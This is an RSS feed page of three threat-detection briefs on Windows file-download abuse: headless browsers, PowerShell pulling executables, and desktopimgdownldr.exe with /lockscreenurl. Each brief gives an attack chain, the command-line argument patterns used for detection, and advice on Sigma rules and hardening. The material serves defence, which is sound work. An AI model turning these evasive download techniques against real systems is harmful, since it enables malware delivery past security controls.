https://feed.craftedsignal.io/tags/file-download/Trending threats, MITRE ATT&CK coverage, and detection metadata — refreshed continuously.Hugoenhello@craftedsignal.iohello@craftedsignal.ioMon, 06 Apr 2026 15:34:19 +0000https://feed.craftedsignal.io/briefs/2026-06-headless-browser-download/Mon, 06 Apr 2026 15:34:19 +0000hello@craftedsignal.iohttps://feed.craftedsignal.io/briefs/2026-06-headless-browser-download/Detects the execution of headless browsers from suspicious parent processes with arguments indicative of scripted retrieval, bypassing application control policies and restrictions on direct download tools.This detection identifies potential file downloads via headless browsers on Windows systems. Attackers abuse headless browser capabilities (chrome.exe, msedge.exe, brave.exe, browser.exe, dragon.exe, vivaldi.exe) to download files, proxy traffic, and bypass application control policies. The technique leverages trusted, signed binaries to evade security restrictions, effectively using the browser as a covert download tool. The activity is characterized by a headless browser being launched from a suspicious parent process, such as a script host, Office application, or command shell, with arguments that facilitate scripted content retrieval like --headless*, --dump-dom, *http*, and data:text/html;base64,*. Defenders should monitor for such anomalous browser behavior to identify and prevent malicious file downloads.

Attack Chain

1. A user unknowingly executes a malicious script or document (e.g., via phishing or drive-by download).
2. The script (e.g., PowerShell, VBScript) or document macro initiates a process, such as cmd.exe or powershell.exe.
3. The parent process spawns a headless browser instance (chrome.exe, msedge.exe, etc.) with the --headless argument.
4. Additional arguments are passed to the headless browser to specify a URL for download or base64 encoded content (--dump-dom *http*, data:text/html;base64,*).
5. The headless browser retrieves the content from the specified URL or decodes the base64 data.
6. The browser saves the downloaded content to disk, often in a user-writable directory.
7. The initial script or document executes the downloaded file or uses it for further malicious activities.
8. The attacker achieves their objective, such as establishing persistence, exfiltrating data, or deploying ransomware.

Impact

Successful exploitation can lead to arbitrary code execution, data compromise, and system compromise. Attackers can use this technique to download malware, bypass security controls, and establish a foothold in the compromised system. The impact can range from individual workstation compromise to large-scale network infiltration, depending on the attacker’s objectives and the privileges of the compromised user.

Recommendation

• Deploy the Sigma rules in this brief to your SIEM to detect suspicious headless browser activity, tuning for your environment.
• Enable process creation logging and command-line auditing to capture the necessary data for the Sigma rules.
• Investigate alerts generated by the Sigma rules, focusing on the parent process, browser arguments, and downloaded file artifacts.
• Review and harden application control policies to restrict the execution of headless browsers from suspicious parent processes.
• Monitor network connections from headless browsers to identify potential command and control traffic or data exfiltration attempts.

]]>highadvisorycommand-and-controlheadless-browserfile-downloadwindowshttps://feed.craftedsignal.io/briefs/2024-01-remote-file-download-powershell/Wed, 03 Jan 2024 15:25:00 +0000hello@craftedsignal.iohttps://feed.craftedsignal.io/briefs/2024-01-remote-file-download-powershell/Detects PowerShell being used to download executable files from untrusted remote destinations, a common technique for attackers to introduce tooling or malware into a compromised environment.Attackers frequently use PowerShell, a legitimate administration tool, to download malicious payloads into compromised systems. This technique allows them to bypass traditional security measures by leveraging a trusted tool. This activity often occurs during the command and control phase, where attackers introduce additional tooling or malware for further exploitation. This rule identifies instances where PowerShell downloads executable and script files from untrusted remote destinations. It does this by correlating network and file events, specifically looking for PowerShell processes initiating network connections to non-whitelisted domains followed by the creation of executable or script files. The rule helps defenders identify and respond to potential command and control activity and malware deployment attempts.

Attack Chain

1. An attacker gains initial access to a Windows system, possibly through phishing or exploiting a vulnerability.
2. The attacker uses PowerShell (powershell.exe, pwsh.exe, or powershell_ise.exe) to initiate a network connection to a remote domain.
3. The DNS request is made to a domain not in the allowed list (e.g., not *.microsoft.com, *.azureedge.net, etc.).
4. PowerShell downloads a file with an executable extension (e.g., .exe, .dll, .ps1, .bat) or a file with a MZ header.
5. The downloaded file is saved to disk.
6. The file is saved to a location that is not excluded by the rule, filtering out commonly used temporary directories.
7. The downloaded executable or script is then executed, leading to further malicious activities.
8. The attacker achieves persistence, lateral movement, or data exfiltration depending on the downloaded payload.

Impact

A successful attack can lead to the introduction of malware, backdoors, or other malicious tools into the compromised system. This can enable attackers to perform a wide range of malicious activities, including data theft, system compromise, and further propagation within the network. The compromised system can become a beachhead for further attacks, potentially impacting numerous systems and leading to significant financial and reputational damage.

Recommendation

• Deploy the Sigma rule PowerShell Remote File Download to detect PowerShell processes downloading executable files from untrusted remote destinations by correlating network and file creation events.
• Enable Elastic Defend to provide the necessary network and file event data for the rule to function correctly as noted in the setup instructions.
• Investigate any alerts generated by the Sigma rule, focusing on the parent process of the PowerShell process, the reputation of the downloaded file, and any other suspicious activities on the affected host, as per the investigation guide in the rule’s note field.
• Review and customize the whitelisted domains in the Sigma rule to match your organization’s specific environment and trusted external resources, as described in the query field.
• Block the identified malicious domains or IP addresses at the network perimeter to prevent further downloads.

]]>mediumadvisorycommand-and-controlfile-downloadpowershellwindowshttps://feed.craftedsignal.io/briefs/2024-01-desktopimgdownldr-remote-file-copy/Wed, 03 Jan 2024 12:00:00 +0000hello@craftedsignal.iohttps://feed.craftedsignal.io/briefs/2024-01-desktopimgdownldr-remote-file-copy/The desktopimgdownldr utility can be abused to download remote files, potentially bypassing standard download restrictions and acting as an alternative to certutil for malware or tool deployment.The desktopimgdownldr.exe utility, a legitimate Windows tool for configuring lock screen and desktop images, can be misused by adversaries to download arbitrary files from remote locations. This is achieved by leveraging the /lockscreenurl argument followed by an HTTP or HTTPS URL. This technique allows attackers to bypass traditional download restrictions and can be used to retrieve malicious payloads, tools, or scripts directly onto a compromised system. This method is particularly effective because desktopimgdownldr.exe is a signed Microsoft binary, potentially evading initial detection based on process name or file reputation. The detection rule was initially created in September 2020 and updated in May 2026. This technique is valuable for attackers seeking to transfer files without using common tools like certutil, powershell, or bitsadmin.

Attack Chain

1. The attacker gains initial access to the target system through an existing vulnerability, credential compromise, or social engineering.
2. The attacker executes desktopimgdownldr.exe with the /lockscreenurl argument, specifying a URL from which to download a malicious file.
3. desktopimgdownldr.exe initiates an HTTP or HTTPS request to the specified URL.
4. The remote server responds with the file content, which desktopimgdownldr.exe saves to disk.
5. The attacker then executes the downloaded file (e.g., a malicious script or executable).
6. The malicious code performs actions such as establishing persistence, escalating privileges, or deploying further malware.
7. The attacker uses the compromised system to move laterally within the network, accessing sensitive data and systems.
8. The attacker achieves their final objective, such as data exfiltration, ransomware deployment, or disruption of services.

Impact

Successful exploitation allows attackers to download and execute arbitrary files on a Windows system, leading to potential compromise of the host and the network. This can result in data theft, system damage, or ransomware infection. Due to the legitimate nature of the desktopimgdownldr.exe utility, this technique can bypass security controls and detection mechanisms, increasing the likelihood of successful exploitation. While the exact number of victims is unknown, any Windows system where an attacker can execute commands is potentially vulnerable.

Recommendation

• Deploy the Sigma rule “Remote File Download via Desktopimgdownldr Utility” to your SIEM to detect the execution of desktopimgdownldr.exe with the /lockscreenurl argument.
• Monitor process creation events for desktopimgdownldr.exe to identify suspicious command-line arguments.
• Enable Sysmon process creation logging to ensure sufficient data is available for the provided Sigma rules.
• Investigate any instances of desktopimgdownldr.exe downloading files from external URLs to determine if they are malicious.
• Implement application control policies to restrict the execution of unauthorized or unknown executables in sensitive environments.

]]>mediumadvisorycommand-and-controlfile-downloadwindowsdesktopimgdownldr